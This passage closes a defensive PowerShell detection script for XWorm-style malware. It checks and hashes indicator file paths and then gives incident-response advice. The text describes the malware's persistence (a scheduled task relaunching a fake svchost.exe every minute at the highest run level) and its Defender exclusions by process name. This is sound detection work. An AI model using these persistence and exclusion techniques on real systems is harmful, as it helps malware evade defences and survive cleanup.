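$iocPaths = 'C:\ProgramData\svchost.exe',
            (Join-Path $env:APPDATA '$phantom-startup_str_599.vbs'),
            (Join-Path $env:APPDATA '$phantom-startup_str_599.bat')
foreach ($f in $iocPaths) {
    if (Test-Path -LiteralPath $f) {
        $h = (Get-FileHash -LiteralPath $f -Algorithm SHA256).Hash
        Add-Finding 'IOCFile' $f "present, SHA256 $h"
    }
}

if ($findings.Count -eq 0) { 'no XWorm-style persistence or exclusion artifacts found' }
else { $findings | Format-Table -AutoSize -Wrap }
```

Treat a hit on any single check as a reason to image the box rather than to clean it: the report shows that, once the task fires, C:\ProgramData\svchost.exe re-launches every minute under the highest run level, so removing the Run key alone does nothing. The Defender exclusions are the quieter finding; Get-MpPreference is the only place they show up, and an exclusion for powershell.exe or svchost.exe by process name has no legitimate administrative use.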